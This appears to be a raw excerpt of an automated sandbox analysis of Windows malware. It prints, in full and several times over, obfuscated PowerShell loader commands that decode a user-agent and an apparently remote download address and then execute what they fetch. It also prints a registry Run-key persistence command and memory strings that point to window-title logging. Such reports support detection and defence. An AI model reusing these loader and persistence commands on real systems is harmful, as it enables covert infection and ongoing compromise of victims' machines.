rusdpleoramtsiklokfoverta sesrolap te.rcil.oudlubcretlg,beei
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$gdnings = 1;$tripetalous='s';$tripetalous+='ubstrin';$tripetalous+='g';function teucrium($gdskes){$expirable=$gdskes.length-$gdnings;for($heltemodiges=4; $heltemodiges -lt $expirable; $heltemodiges+=(5)){$mirakeldoktorerne+=$gdskes.$tripetalous.invoke($heltemodiges, $gdnings);}$mirakeldoktorerne;}function regulerbare($reticularia){& ($bestandigst) ($reticularia);}$planlggelserne235=teucrium 'leopmc,mpo croz freiprpol.hrilm rgabri /pree5 c r. hex0pl n embr( ha,w po ihemon.lgndpreeo eksw,olissttt ,ppnupt t yie red1ud.i0 mul.fodb0 ska; skr assuwbyttiovernse.s6.oti4el.x; tre depexwhis6u mo4 de,;vsk, alir,entv stt:.aus1,esu2 pic1fagb.cryp0 m t)w.tc d.lggopree npctrickstigoskgg/,jle2 kry0 me 1s lt0stoc0cruo1frkk0sahu1skru kontfskanipertrupcre kiaf valondrixlavr/konv1floc2scou1appl.,ont0stru ';$improvers=teucrium 'arbeudoubstaleepianrtarv-,rogatwitgsclae p.lnte stklas ';$ovariectomize=teucrium 'a rthsemit mastsuffpdykksnonp: saa/nedj/ortoegensu lymrjyd.opimepbegirngomof,rst jere,agncanstt fidisocievir,. t sr.fproch.r/glasmtri,e ciktarb,hmargisemin aasknice1phle. taktnonrhkdlsnover ';$astor=teucrium 'nonf> nd ';$bestandigst=teucrium ' pleil.doesp,lxskit ';$executry203='smittefaren';regulerbare (teucrium 'pugistecoepelstdeta-ventcfl.lodelininddtprepetilbnfreet taa lill-ex.epbehea.psot ab hperi raket k,o:gemm\adjuntartvbossn oce matltemps,obbeeu,o. fortepipxesthtbifr whis-garbv refator lundeuboreehyl pier$blyse remxre.pebigacdionubnsktnonsr a,kydoci2nedv0term3r,ma; men ');regulerbare (teucrium 'untri ov.fhaem sal,(tudbt brue kunsapp tzebr- alpno sa .irt o qh bi nonetgerm:ecot\re pndor v ston mone aceltoilsagroeafsk.tre.tfro x depthjlp)euph{quiceafsyxkvadite.rtsqui}m,le;mi.l ');$teariness = teucrium 'freredynecscrahimp.o gid brul%.ddea,uffp hi pfilhdmadnani,at ma,askum%ha g\beavpov rr nolediscs mani iklgdiagnpappa t,slved 2shir3bu g.syndh,alla konl uni fl,&pose&eate byliebillcafhohpanto kns ve s$tota ';regulerbare (teucrium 'p.lu$c.shgma,tlabonoenthbaspeausorlk ap:fores timu av,ban ri alinram,soprre frerconjtspariun cocronnkass= tek(sprnc kremdertdm.lj felt/ haycmerc over$romet ,rleleveascrur pa.i misnkalde orrsraglsbewh)wamu ');regulerbare (teucrium 'sku,$havigacrold.inovipeblmlea banlm rk: eartdiobaweevaudbyl ly maffao f,rdb,rti c,ag spkh udse.ndbdamin= con$ tevocarov.atra odorpolyirepreoverctordtsor.ostorm accibe,nzsamdebybu.mil,srek.pr onldhoti usttlivs(afsk$ .oba regsbrantdiviogeinrd.mo)a.me ');$ovariectomize=$taalmodighed[0];regulerbare (teucrium ' bra$ lobg mallt.lfot rbbafh.asenels,co:pos d iderberbimetof a itlinesgimbp prorglewoeumeb kval skaedispm u seskrur pensnois=.kvand ugepaliw vul- haro egabarmojflerealdrc f.rtcy e man suna yn nssbkkettabeef,rgmhakk.dis.n exte britbar,.briewethiefan,beftecsaltlmanni.lidebrnenbaa,t tem ');regulerbare (teucrium 'foli$ rusdpleoramtsiklokfoverta sesrolap te.rcil.oudlubcretlg,beei
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "vibeka" /t reg_expand_sz /d "%pneumatorrhachis% -w 1 $salpeterholdiges=(get-itemproperty -path 'hkcu:\quicker\').savvy;%pneumatorrhachis% ($salpeterholdiges)"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$raakolde = 1;$fornrmet='s';$fornrmet+='ubstrin';$fornrmet+='g';function circumflexes($cumulet){$semimonarchically=$cumulet.length-$raakolde;for($habitually=4; $habitually -lt $semimonarchically; $habitually+=(5)){$wenzel+=$cumulet.$fornrmet.invoke($habitually, $raakolde);}$wenzel;}function jettes($trendy){&($indbagendes) ($trendy);}$simultansceners=circumflexes 'ark,mmervoan.czvampit lel elelblreasy.o/jagt5 ve.seac0t,sp ryg.( krmw.urdiriitn s rdpi do.orhwalloshjem g,on prat.oli ,eg1inte0remb.spra0anal;duct ret.wvagtiatomnskyt6aced4 non;falc f.glx.art6pseu4.icr;rovf milrgramvnert:nara1h,lg2rive1unde.sopr0pres)vrd. p.slg,ndeecubacskinktillooffp/slib2pl r0ned,1appe0onyc0ven,1 enn0trfi1 bre v defmickikonsr traea.trf dr oqrscxsamm/moor1hard2 ,or1werf.,yde0.uto ';$optrins45=circumflexes 'tidsui.prsp,yceskabrover-stemaukeng,ondelivine,tethera ';$levemulighed=circumflexes 'b,slhg,ldt mentinflpko,m:conf/ke,d/,ndf8ago.7 bal.pige1cann2.ejl1 fer.,rol1diet0nona5 ske..ata1 bl,6ex.e3kast/srmrd kile ne.tskreeindmn rot myxibe aokonknconse boyndesi.s,rtj.attadissv toda non ';$cose=circumflexes 'skor>undi ';$indbagendes=circumflexes 'dm,nimilieselsx bar ';$nutritionary133='paakldtes';jettes (circumflexes 'ch dssonaeautotalda-unmyc.rocovalgn,annt ende.enin s.dto er can- nobp ixta fo.tbindhme.k vrditsorg:baga\pt.rfbureopot,routshtot,j s.iuretrlillesfletbtikmr gabesmaamradesamoret ivs.lbn.margtaircx iltsaut pote-la dvkinea boll safuencaediap ,npr$causn illudiglt tndr,nbrikon,tbra,iun.kodegenspydatricr egnykrim1k.ip3erem3l.eb; bri ');jettes (circumflexes 'tr.ni.inkfhoo. skil(indit aroeundesuafmtepit-drukpfareaskibtduplhafid siltruck:none\sla,f sgeo bu,rtec.hobsejap.puquanlbloks ostbs,mmrp osepal.msociscudbe pics a,m.te rtbre,xdigit ,fl),era{giske andxre ainacrtcham}pg.e;ergo ');$ballplayers248 = circumflexes ' nkespikc udmhsiego lgu eksp%s,paabageptaktpotopdelemaimpetarchatran%she,\paraatrignkolltho,eiangulskrmltr.ke anpa jounchr,1umed4 c.s4sur...lumgvilkrbel.oje n ef e&sa,m&d.ge upfiebil cunnah kreon,np ci.i$ kri ';jettes (circumflexes 'real$,eclgfalsl.nifoaxi,bwolfaafselcoin:sgesfscrso vrmrbrbaabronn kkek tabr,obbigre nresig kr,s oltpoverucafenoverksol t kurebagnt bits .ps=abd.(dab,csju.mel md ,in ferr/calcc ch, f rs$bedrbpi radra,lsna lurfjpmarkldialairr.yindve r,trseiss puz2duct4ba.h8phot)dri ');jettes (circumflexes 'ha.l$slvsgeftel nfost,ibm.inatabpltick: spea moklectovsubte uneoregilsndaierodtdispemdrestol =lnn,$myndlraskeskilv w.veforbmstrauf rflgauki.azigyemehpreee traddole.regeseft.p ci.lindaivar.tva,e(sume$enhecformo.dves pree g.n)spil ');$levemulighed=$alveolites[0];jettes (circumflexes 'anbr$.addgu.trl ,taoim ebta.ba.alclb,nk:bests.orkk gibem,aspjotats yti ,unccoa,=partndagbe kecwurok-,lafowainb ejljskrseuns.curo.t.onc b anssvalyvands igmtm.scejug msoap.fascnphylefre,t iga..oncwhetee cikb istcderalkin isporemetanmapptf er ');jet
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$raakolde = 1;$fornrmet='s';$fornrmet+='ubstrin';$fornrmet+='g';function circumflexes($cumulet){$semimonarchically=$cumulet.length-$raakolde;for($habitually=4; $habitually -lt $semimonarchically; $habitually+=(5)){$wenzel+=$cumulet.$fornrmet.invoke($habitually, $raakolde);}$wenzel;}function jettes($trendy){&($indbagendes) ($trendy);}$simultansceners=circumflexes 'ark,mmervoan.czvampit lel elelblreasy.o/jagt5 ve.seac0t,sp ryg.( krmw.urdiriitn s rdpi do.orhwalloshjem g,on prat.oli ,eg1inte0remb.spra0anal;duct ret.wvagtiatomnskyt6aced4 non;falc f.glx.art6pseu4.icr;rovf milrgramvnert:nara1h,lg2rive1unde.sopr0pres)vrd. p.slg,ndeecubacskinktillooffp/slib2pl r0ned,1appe0onyc0ven,1 enn0trfi1 bre v defmickikonsr traea.trf dr oqrscxsamm/moor1hard2 ,or1werf.,yde0.uto ';$optrins45=circumflexes 'tidsui.prsp,yceskabrover-stemaukeng,ondelivine,tethera ';$levemulighed=circumflexes 'b,slhg,ldt mentinflpko,m:conf/ke,d/,ndf8ago.7 bal.pige1cann2.ejl1 fer.,rol1diet0nona5 ske..ata1 bl,6ex.e3kast/srmrd kile ne.tskreeindmn rot myxibe aokonknconse boyndesi.s,rtj.attadissv toda non ';$cose=circumflexes 'skor>undi ';$indbagendes=circumflexes 'dm,nimilieselsx bar ';$nutritionary133='paakldtes';jettes (circumflexes 'ch dssonaeautotalda-unmyc.rocovalgn,annt ende.enin s.dto er can- nobp ixta fo.tbindhme.k vrditsorg:baga\pt.rfbureopot,routshtot,j s.iuretrlillesfletbtikmr gabesmaamradesamoret ivs.lbn.margtaircx iltsaut pote-la dvkinea boll safuencaediap ,npr$causn illudiglt tndr,nbrikon,tbra,iun.kodegenspydatricr egnykrim1k.ip3erem3l.eb; bri ');jettes (circumflexes 'tr.ni.inkfhoo. skil(indit aroeundesuafmtepit-drukpfareaskibtduplhafid siltruck:none\sla,f sgeo bu,rtec.hobsejap.puquanlbloks ostbs,mmrp osepal.msociscudbe pics a,m.te rtbre,xdigit ,fl),era{giske andxre ainacrtcham}pg.e;ergo ');$ballplayers248 = circumflexes ' nkespikc udmhsiego lgu eksp%s,paabageptaktpotopdelemaimpetarchatran%she,\paraatrignkolltho,eiangulskrmltr.ke anpa jounchr,1umed4 c.s4sur...lumgvilkrbel.oje n ef e&sa,m&d.ge upfiebil cunnah kreon,np ci.i$ kri ';jettes (circumflexes 'real$,eclgfalsl.nifoaxi,bwolfaafselcoin:sgesfscrso vrmrbrbaabronn kkek tabr,obbigre nresig kr,s oltpoverucafenoverksol t kurebagnt bits .ps=abd.(dab,csju.mel md ,in ferr/calcc ch, f rs$bedrbpi radra,lsna lurfjpmarkldialairr.yindve r,trseiss puz2duct4ba.h8phot)dri ');jettes (circumflexes 'ha.l$slvsgeftel nfost,ibm.inatabpltick: spea moklectovsubte uneoregilsndaierodtdispemdrestol =lnn,$myndlraskeskilv w.veforbmstrauf rflgauki.azigyemehpreee traddole.regeseft.p ci.lindaivar.tva,e(sume$enhecformo.dves pree g.n)spil ');$levemulighed=$alveolites[0];jettes (circumflexes 'anbr$.addgu.trl ,taoim ebta.ba.alclb,nk:bests.orkk gibem,aspjotats yti ,unccoa,=partndagbe kecwurok-,lafowainb ejljskrseuns.curo.t.onc b anssvalyvands igmtm.scejug msoap.fascnphylefre,t iga..oncwhetee cikb istcderalkin isporemetanmapptf er ');jet
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$gdnings = 1;$tripetalous='s';$tripetalous+='ubstrin';$tripetalous+='g';function teucrium($gdskes){$expirable=$gdskes.length-$gdnings;for($heltemodiges=4; $heltemodiges -lt $expirable; $heltemodiges+=(5)){$mirakeldoktorerne+=$gdskes.$tripetalous.invoke($heltemodiges, $gdnings);}$mirakeldoktorerne;}function regulerbare($reticularia){& ($bestandigst) ($reticularia);}$planlggelserne235=teucrium 'leopmc,mpo croz freiprpol.hrilm rgabri /pree5 c r. hex0pl n embr( ha,w po ihemon.lgndpreeo eksw,olissttt ,ppnupt t yie red1ud.i0 mul.fodb0 ska; skr assuwbyttiovernse.s6.oti4el.x; tre depexwhis6u mo4 de,;vsk, alir,entv stt:.aus1,esu2 pic1fagb.cryp0 m t)w.tc d.lggopree npctrickstigoskgg/,jle2 kry0 me 1s lt0stoc0cruo1frkk0sahu1skru kontfskanipertrupcre kiaf valondrixlavr/konv1floc2scou1appl.,ont0stru ';$improvers=teucrium 'arbeudoubstaleepianrtarv-,rogatwitgsclae p.lnte stklas ';$ovariectomize=teucrium 'a rthsemit mastsuffpdykksnonp: saa/nedj/ortoegensu lymrjyd.opimepbegirngomof,rst jere,agncanstt fidisocievir,. t sr.fproch.r/glasmtri,e ciktarb,hmargisemin aasknice1phle. taktnonrhkdlsnover ';$astor=teucrium 'nonf> nd ';$bestandigst=teucrium ' pleil.doesp,lxskit ';$executry203='smittefaren';regulerbare (teucrium 'pugistecoepelstdeta-ventcfl.lodelininddtprepetilbnfreet taa lill-ex.epbehea.psot ab hperi raket k,o:gemm\adjuntartvbossn oce matltemps,obbeeu,o. fortepipxesthtbifr whis-garbv refator lundeuboreehyl pier$blyse remxre.pebigacdionubnsktnonsr a,kydoci2nedv0term3r,ma; men ');regulerbare (teucrium 'untri ov.fhaem sal,(tudbt brue kunsapp tzebr- alpno sa .irt o qh bi nonetgerm:ecot\re pndor v ston mone aceltoilsagroeafsk.tre.tfro x depthjlp)euph{quiceafsyxkvadite.rtsqui}m,le;mi.l ');$teariness = teucrium 'freredynecscrahimp.o gid brul%.ddea,uffp hi pfilhdmadnani,at ma,askum%ha g\beavpov rr nolediscs mani iklgdiagnpappa t,slved 2shir3bu g.syndh,alla konl uni fl,&pose&eate byliebillcafhohpanto kns ve s$tota ';regulerbare (teucrium 'p.lu$c.shgma,tlabonoenthbaspeausorlk ap:fores timu av,ban ri alinram,soprre frerconjtspariun cocronnkass= tek(sprnc kremdertdm.lj felt/ haycmerc over$romet ,rleleveascrur pa.i misnkalde orrsraglsbewh)wamu ');regulerbare (teucrium 'sku,$havigacrold.inovipeblmlea banlm rk: eartdiobaweevaudbyl ly maffao f,rdb,rti c,ag spkh udse.ndbdamin= con$ tevocarov.atra odorpolyirepreoverctordtsor.ostorm accibe,nzsamdebybu.mil,srek.pr onldhoti usttlivs(afsk$ .oba regsbrantdiviogeinrd.mo)a.me ');$ovariectomize=$taalmodighed[0];regulerbare (teucrium ' bra$ lobg mallt.lfot rbbafh.asenels,co:pos d iderberbimetof a itlinesgimbp prorglewoeumeb kval skaedispm u seskrur pensnois=.kvand ugepaliw vul- haro egabarmojflerealdrc f.rtcy e man suna yn nssbkkettabeef,rgmhakk.dis.n exte britbar,.briewethiefan,beftecsaltlmanni.lidebrnenbaa,t tem ');regulerbare (teucrium 'foli$ rusdpleoramtsiklokfoverta sesrolap te.rcil.oudlubcretlg,beeiJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$gdnings = 1;$tripetalous='s';$tripetalous+='ubstrin';$tripetalous+='g';function teucrium($gdskes){$expirable=$gdskes.length-$gdnings;for($heltemodiges=4; $heltemodiges -lt $expirable; $heltemodiges+=(5)){$mirakeldoktorerne+=$gdskes.$tripetalous.invoke($heltemodiges, $gdnings);}$mirakeldoktorerne;}function regulerbare($reticularia){& ($bestandigst) ($reticularia);}$planlggelserne235=teucrium 'leopmc,mpo croz freiprpol.hrilm rgabri /pree5 c r. hex0pl n embr( ha,w po ihemon.lgndpreeo eksw,olissttt ,ppnupt t yie red1ud.i0 mul.fodb0 ska; skr assuwbyttiovernse.s6.oti4el.x; tre depexwhis6u mo4 de,;vsk, alir,entv stt:.aus1,esu2 pic1fagb.cryp0 m t)w.tc d.lggopree npctrickstigoskgg/,jle2 kry0 me 1s lt0stoc0cruo1frkk0sahu1skru kontfskanipertrupcre kiaf valondrixlavr/konv1floc2scou1appl.,ont0stru ';$improvers=teucrium 'arbeudoubstaleepianrtarv-,rogatwitgsclae p.lnte stklas ';$ovariectomize=teucrium 'a rthsemit mastsuffpdykksnonp: saa/nedj/ortoegensu lymrjyd.opimepbegirngomof,rst jere,agncanstt fidisocievir,. t sr.fproch.r/glasmtri,e ciktarb,hmargisemin aasknice1phle. taktnonrhkdlsnover ';$astor=teucrium 'nonf> nd ';$bestandigst=teucrium ' pleil.doesp,lxskit ';$executry203='smittefaren';regulerbare (teucrium 'pugistecoepelstdeta-ventcfl.lodelininddtprepetilbnfreet taa lill-ex.epbehea.psot ab hperi raket k,o:gemm\adjuntartvbossn oce matltemps,obbeeu,o. fortepipxesthtbifr whis-garbv refator lundeuboreehyl pier$blyse remxre.pebigacdionubnsktnonsr a,kydoci2nedv0term3r,ma; men ');regulerbare (teucrium 'untri ov.fhaem sal,(tudbt brue kunsapp tzebr- alpno sa .irt o qh bi nonetgerm:ecot\re pndor v ston mone aceltoilsagroeafsk.tre.tfro x depthjlp)euph{quiceafsyxkvadite.rtsqui}m,le;mi.l ');$teariness = teucrium 'freredynecscrahimp.o gid brul%.ddea,uffp hi pfilhdmadnani,at ma,askum%ha g\beavpov rr nolediscs mani iklgdiagnpappa t,slved 2shir3bu g.syndh,alla konl uni fl,&pose&eate byliebillcafhohpanto kns ve s$tota ';regulerbare (teucrium 'p.lu$c.shgma,tlabonoenthbaspeausorlk ap:fores timu av,ban ri alinram,soprre frerconjtspariun cocronnkass= tek(sprnc kremdertdm.lj felt/ haycmerc over$romet ,rleleveascrur pa.i misnkalde orrsraglsbewh)wamu ');regulerbare (teucrium 'sku,$havigacrold.inovipeblmlea banlm rk: eartdiobaweevaudbyl ly maffao f,rdb,rti c,ag spkh udse.ndbdamin= con$ tevocarov.atra odorpolyirepreoverctordtsor.ostorm accibe,nzsamdebybu.mil,srek.pr onldhoti usttlivs(afsk$ .oba regsbrantdiviogeinrd.mo)a.me ');$ovariectomize=$taalmodighed[0];regulerbare (teucrium ' bra$ lobg mallt.lfot rbbafh.asenels,co:pos d iderberbimetof a itlinesgimbp prorglewoeumeb kval skaedispm u seskrur pensnois=.kvand ugepaliw vul- haro egabarmojflerealdrc f.rtcy e man suna yn nssbkkettabeef,rgmhakk.dis.n exte britbar,.briewethiefan,beftecsaltlmanni.lidebrnenbaa,t tem ');regulerbare (teucrium 'foli$ rusdpleoramtsiklokfoverta sesrolap te.rcil.oudlubcretlg,beeiJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "vibeka" /t reg_expand_sz /d "%pneumatorrhachis% -w 1 $salpeterholdiges=(get-itemproperty -path 'hkcu:\quicker\').savvy;%pneumatorrhachis% ($salpeterholdiges)"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$raakolde = 1;$fornrmet='s';$fornrmet+='ubstrin';$fornrmet+='g';function circumflexes($cumulet){$semimonarchically=$cumulet.length-$raakolde;for($habitually=4; $habitually -lt $semimonarchically; $habitually+=(5)){$wenzel+=$cumulet.$fornrmet.invoke($habitually, $raakolde);}$wenzel;}function jettes($trendy){&($indbagendes) ($trendy);}$simultansceners=circumflexes 'ark,mmervoan.czvampit lel elelblreasy.o/jagt5 ve.seac0t,sp ryg.( krmw.urdiriitn s rdpi do.orhwalloshjem g,on prat.oli ,eg1inte0remb.spra0anal;duct ret.wvagtiatomnskyt6aced4 non;falc f.glx.art6pseu4.icr;rovf milrgramvnert:nara1h,lg2rive1unde.sopr0pres)vrd. p.slg,ndeecubacskinktillooffp/slib2pl r0ned,1appe0onyc0ven,1 enn0trfi1 bre v defmickikonsr traea.trf dr oqrscxsamm/moor1hard2 ,or1werf.,yde0.uto ';$optrins45=circumflexes 'tidsui.prsp,yceskabrover-stemaukeng,ondelivine,tethera ';$levemulighed=circumflexes 'b,slhg,ldt mentinflpko,m:conf/ke,d/,ndf8ago.7 bal.pige1cann2.ejl1 fer.,rol1diet0nona5 ske..ata1 bl,6ex.e3kast/srmrd kile ne.tskreeindmn rot myxibe aokonknconse boyndesi.s,rtj.attadissv toda non ';$cose=circumflexes 'skor>undi ';$indbagendes=circumflexes 'dm,nimilieselsx bar ';$nutritionary133='paakldtes';jettes (circumflexes 'ch dssonaeautotalda-unmyc.rocovalgn,annt ende.enin s.dto er can- nobp ixta fo.tbindhme.k vrditsorg:baga\pt.rfbureopot,routshtot,j s.iuretrlillesfletbtikmr gabesmaamradesamoret ivs.lbn.margtaircx iltsaut pote-la dvkinea boll safuencaediap ,npr$causn illudiglt tndr,nbrikon,tbra,iun.kodegenspydatricr egnykrim1k.ip3erem3l.eb; bri ');jettes (circumflexes 'tr.ni.inkfhoo. skil(indit aroeundesuafmtepit-drukpfareaskibtduplhafid siltruck:none\sla,f sgeo bu,rtec.hobsejap.puquanlbloks ostbs,mmrp osepal.msociscudbe pics a,m.te rtbre,xdigit ,fl),era{giske andxre ainacrtcham}pg.e;ergo ');$ballplayers248 = circumflexes ' nkespikc udmhsiego lgu eksp%s,paabageptaktpotopdelemaimpetarchatran%she,\paraatrignkolltho,eiangulskrmltr.ke anpa jounchr,1umed4 c.s4sur...lumgvilkrbel.oje n ef e&sa,m&d.ge upfiebil cunnah kreon,np ci.i$ kri ';jettes (circumflexes 'real$,eclgfalsl.nifoaxi,bwolfaafselcoin:sgesfscrso vrmrbrbaabronn kkek tabr,obbigre nresig kr,s oltpoverucafenoverksol t kurebagnt bits .ps=abd.(dab,csju.mel md ,in ferr/calcc ch, f rs$bedrbpi radra,lsna lurfjpmarkldialairr.yindve r,trseiss puz2duct4ba.h8phot)dri ');jettes (circumflexes 'ha.l$slvsgeftel nfost,ibm.inatabpltick: spea moklectovsubte uneoregilsndaierodtdispemdrestol =lnn,$myndlraskeskilv w.veforbmstrauf rflgauki.azigyemehpreee traddole.regeseft.p ci.lindaivar.tva,e(sume$enhecformo.dves pree g.n)spil ');$levemulighed=$alveolites[0];jettes (circumflexes 'anbr$.addgu.trl ,taoim ebta.ba.alclb,nk:bests.orkk gibem,aspjotats yti ,unccoa,=partndagbe kecwurok-,lafowainb ejljskrseuns.curo.t.onc b anssvalyvands igmtm.scejug msoap.fascnphylefre,t iga..oncwhetee cikb istcderalkin isporemetanmapptf er ');jetJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$raakolde = 1;$fornrmet='s';$fornrmet+='ubstrin';$fornrmet+='g';function circumflexes($cumulet){$semimonarchically=$cumulet.length-$raakolde;for($habitually=4; $habitually -lt $semimonarchically; $habitually+=(5)){$wenzel+=$cumulet.$fornrmet.invoke($habitually, $raakolde);}$wenzel;}function jettes($trendy){&($indbagendes) ($trendy);}$simultansceners=circumflexes 'ark,mmervoan.czvampit lel elelblreasy.o/jagt5 ve.seac0t,sp ryg.( krmw.urdiriitn s rdpi do.orhwalloshjem g,on prat.oli ,eg1inte0remb.spra0anal;duct ret.wvagtiatomnskyt6aced4 non;falc f.glx.art6pseu4.icr;rovf milrgramvnert:nara1h,lg2rive1unde.sopr0pres)vrd. p.slg,ndeecubacskinktillooffp/slib2pl r0ned,1appe0onyc0ven,1 enn0trfi1 bre v defmickikonsr traea.trf dr oqrscxsamm/moor1hard2 ,or1werf.,yde0.uto ';$optrins45=circumflexes 'tidsui.prsp,yceskabrover-stemaukeng,ondelivine,tethera ';$levemulighed=circumflexes 'b,slhg,ldt mentinflpko,m:conf/ke,d/,ndf8ago.7 bal.pige1cann2.ejl1 fer.,rol1diet0nona5 ske..ata1 bl,6ex.e3kast/srmrd kile ne.tskreeindmn rot myxibe aokonknconse boyndesi.s,rtj.attadissv toda non ';$cose=circumflexes 'skor>undi ';$indbagendes=circumflexes 'dm,nimilieselsx bar ';$nutritionary133='paakldtes';jettes (circumflexes 'ch dssonaeautotalda-unmyc.rocovalgn,annt ende.enin s.dto er can- nobp ixta fo.tbindhme.k vrditsorg:baga\pt.rfbureopot,routshtot,j s.iuretrlillesfletbtikmr gabesmaamradesamoret ivs.lbn.margtaircx iltsaut pote-la dvkinea boll safuencaediap ,npr$causn illudiglt tndr,nbrikon,tbra,iun.kodegenspydatricr egnykrim1k.ip3erem3l.eb; bri ');jettes (circumflexes 'tr.ni.inkfhoo. skil(indit aroeundesuafmtepit-drukpfareaskibtduplhafid siltruck:none\sla,f sgeo bu,rtec.hobsejap.puquanlbloks ostbs,mmrp osepal.msociscudbe pics a,m.te rtbre,xdigit ,fl),era{giske andxre ainacrtcham}pg.e;ergo ');$ballplayers248 = circumflexes ' nkespikc udmhsiego lgu eksp%s,paabageptaktpotopdelemaimpetarchatran%she,\paraatrignkolltho,eiangulskrmltr.ke anpa jounchr,1umed4 c.s4sur...lumgvilkrbel.oje n ef e&sa,m&d.ge upfiebil cunnah kreon,np ci.i$ kri ';jettes (circumflexes 'real$,eclgfalsl.nifoaxi,bwolfaafselcoin:sgesfscrso vrmrbrbaabronn kkek tabr,obbigre nresig kr,s oltpoverucafenoverksol t kurebagnt bits .ps=abd.(dab,csju.mel md ,in ferr/calcc ch, f rs$bedrbpi radra,lsna lurfjpmarkldialairr.yindve r,trseiss puz2duct4ba.h8phot)dri ');jettes (circumflexes 'ha.l$slvsgeftel nfost,ibm.inatabpltick: spea moklectovsubte uneoregilsndaierodtdispemdrestol =lnn,$myndlraskeskilv w.veforbmstrauf rflgauki.azigyemehpreee traddole.regeseft.p ci.lindaivar.tva,e(sume$enhecformo.dves pree g.n)spil ');$levemulighed=$alveolites[0];jettes (circumflexes 'anbr$.addgu.trl ,taoim ebta.ba.alclb,nk:bests.orkk gibem,aspjotats yti ,unccoa,=partndagbe kecwurok-,lafowainb ejljskrseuns.curo.t.onc b anssvalyvands igmtm.scejug msoap.fascnphylefre,t iga..oncwhetee cikb istcderalkin isporemetanmapptf er ');jetJump to behavior
            Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, qDlmBUIvkRrWNd.exe, 0000001F.00000002.3290382867.00000000013D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: qDlmBUIvkRrWNd.exe, 0000001F.00000002.3290382867.00000000013D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: wab.exe, 00000008.00000002.3295624818.00000000064A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/04/30 02:26:47 Program Manager]
            Source: qDlmBUIvkRrWNd.exe, 0000001F.00000002.3290382867.00000000013D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: wab.exe, 00000008.00000003.2537135847.00000000064A5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/04/26 07:40:44 Program Manager]
            Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerONS
            Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
            Source: qDlmBUIvkRrWNd.exe, 0000001F.00000002.3290382867.00000000013D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: wab.exe, 00000008.00000003.2537070704.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295900301.00000000064FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
            Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/04/26 09:11:46 Program Manager]
            Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles
            Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/04/26 07:41:23 Program Manager]
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E2933 cpuid 8_2_222E2933
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
